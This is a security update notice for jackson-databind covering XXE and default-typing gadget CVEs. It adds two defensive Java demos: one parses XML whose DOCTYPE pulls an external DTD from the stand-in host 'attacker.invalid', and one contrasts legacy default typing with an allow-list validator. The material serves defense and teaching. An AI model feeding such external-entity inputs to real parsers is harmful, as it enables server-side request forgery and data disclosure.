Security update for jackson-databind
This update for jackson-databind fixes the following issues:
jackson-databind was updated to 2.10.5.1:
* #2589: `DOMDeserializer`: setExpandEntityReferences(false) may
not prevent external entity expansion in all cases
(CVE-2020-25649, bsc#1177616)
* #2787 (partial fix): NPE after adding a mixin for an enum
* #2679: 'ObjectMapper.readValue("123", Void.TYPE)' throws
"should never occur"
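The first entry above is the XXE fix. The reason `setExpandEntityReferences(false)` is not enough on its own is that it only controls whether `EntityReference` nodes are expanded in the resulting DOM tree; the parser still fetches an external DTD named in a `DOCTYPE`, and with it any external entities it declares. The Java program below is an added illustration, not jackson-databind's patch or SUSE's code: it contrasts a `DocumentBuilderFactory` configured the way the vulnerable deserializer was with a hardened one that refuses `DOCTYPE` altogether. The XML input, the placeholder host `attacker.invalid` and the class and method names are constructed for this example; the `EntityResolver` intercepts the fetch so nothing leaves the machine.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

/**
 * Added example (not jackson-databind's own code). Shows that
 * setExpandEntityReferences(false) alone does not stop a DOM parser from
 * resolving an external DTD, and what a hardened factory looks like.
 */
public class DomXxeDemo {

    // Constructed input: the DOCTYPE points at an external DTD. The URL is a
    // placeholder; the resolver below intercepts it, so nothing is fetched.
    static final String XML_WITH_EXTERNAL_DTD =
            "<?xml version=\"1.0\"?>\n"
          + "<!DOCTYPE note SYSTEM \"http://attacker.invalid/evil.dtd\">\n"
          + "<note>hello</note>";

    // The pre-fix shape: looks safe, but only affects whether EntityReference
    // nodes are expanded in the DOM; DTD loading is untouched.
    static DocumentBuilderFactory weakFactory() {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        f.setExpandEntityReferences(false);
        return f;
    }

    // Hardened shape: reject any DOCTYPE (so no DTD and no entity declarations
    // at all), and additionally switch off external entities, external DTD
    // loading and XInclude in case a parser ignores the first feature.
    static DocumentBuilderFactory hardenedFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setNamespaceAware(true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Parses the sample and returns every external system ID the parser asked to resolve. */
    static List<String> parseAndRecordFetches(DocumentBuilderFactory f) throws Exception {
        List<String> fetched = new ArrayList<>();
        DocumentBuilder b = f.newDocumentBuilder();
        b.setEntityResolver((publicId, systemId) -> {
            fetched.add(systemId);                        // record the attempted fetch
            return new InputSource(new StringReader("")); // and hand back an empty DTD
        });
        b.parse(new InputSource(new StringReader(XML_WITH_EXTERNAL_DTD)));
        return fetched;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("weak factory tried to fetch: " + parseAndRecordFetches(weakFactory()));
        try {
            parseAndRecordFetches(hardenedFactory());
            System.out.println("hardened factory parsed the DOCTYPE input (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened factory rejected the input: " + e.getMessage());
        }
    }
}
```

With the JDK's bundled Xerces the weak factory hands the external DTD URL to the resolver even though entity expansion is off, while the hardened factory fails with a `SAXParseException` at the `DOCTYPE` line before any of the body is read. Feature URIs are parser specific, so the `setFeature` calls are wrapped in a `throws` here; in production code catch `ParserConfigurationException` per feature and fail closed rather than silently continue without it.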
This update was imported from the SUSE:SLE-15-SP2:Update update project.
Submitted by
Fridrich Strba (fstrba)
Fixed bugs
bnc#1181118
VUL-0: CVE-2021-20190: jackson-databind: SSRF due to mishandling interaction between serialization gadgets and typing
bnc#1180391
VUL-0: CVE-2020-35728: jackson-databind: mishandles the interaction between serialization gadgets and typing
bnc#1177616
VUL-0: CVE-2020-25649: jackson-databind: FasterXML DOMDeserializer insecure entity expansion is vulnerable to XML external entity (XXE)
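The two "serialization gadgets and typing" entries concern Jackson's default typing, where the JSON document itself names the class to instantiate. Each such CVE extends a deny-list of known gadget classes; the durable fix is an allow-list of the types your application actually expects. The program below is an added example, not jackson-databind's or SUSE's code: it puts the legacy `enableDefaultTyping()` beside the 2.10 replacement, `activateDefaultTyping` with a `BasicPolymorphicTypeValidator`. `Greeting` and `SideEffectBean` are constructed stand-ins (the latter plays the role of an unexpected class with a side-effecting setter and is not one of the classes named in the CVEs).

```java
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

/**
 * Added example (not jackson-databind's own code). Contrasts legacy default
 * typing, which accepts any class name the JSON supplies, with an allow-list
 * PolymorphicTypeValidator that refuses everything else before instantiation.
 */
public class DefaultTypingDemo {

    /** Constructed model type that we do want to deserialize polymorphically. */
    public static class Greeting {
        public String text;
    }

    /** Constructed stand-in for an unexpected class: its setter has a side effect. */
    public static class SideEffectBean {
        static int setterCalls = 0;
        public void setPath(String path) { setterCalls++; }
    }

    // Legacy configuration (deprecated since 2.10): protection rests on the
    // built-in deny-list of known gadget classes alone.
    @SuppressWarnings("deprecation")
    static ObjectMapper legacyMapper() {
        ObjectMapper m = new ObjectMapper();
        m.enableDefaultTyping();
        return m;
    }

    // Hardened configuration: only subtypes of Greeting may be named in a
    // type id; anything else is rejected before the class is instantiated.
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType(Greeting.class)
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL);
        return m;
    }

    /** Builds the WRAPPER_ARRAY form default typing uses: ["class.Name", {...}]. */
    static String typed(String className, String body) {
        return "[\"" + className + "\"," + body + "]";
    }

    public static void main(String[] args) throws Exception {
        String expected   = typed(Greeting.class.getName(), "{\"text\":\"hi\"}");
        String unexpected = typed(SideEffectBean.class.getName(), "{\"path\":\"/tmp/x\"}");

        Object g = hardenedMapper().readValue(expected, Object.class);
        System.out.println("allow-listed type deserialized as " + g.getClass().getName());

        legacyMapper().readValue(unexpected, Object.class);
        System.out.println("legacy typing instantiated the unexpected class and ran its setter "
                + SideEffectBean.setterCalls + " time(s)");

        try {
            hardenedMapper().readValue(unexpected, Object.class);
            System.out.println("hardened typing accepted the unexpected class (unexpected)");
        } catch (InvalidTypeIdException e) {
            System.out.println("hardened typing refused it: " + e.getMessage());
        }
    }
}
```

The legacy mapper happily builds `SideEffectBean` because it is on no deny-list, which is exactly the pattern each of these CVEs repeats with a new class; the validator-backed mapper throws `InvalidTypeIdException` from the type id alone. Prefer `allowIfSubType(Class)` or a package prefix over `allowIfBaseType`, and avoid enabling default typing for `Object` at all when a `@JsonTypeInfo` annotation on a specific base type would do.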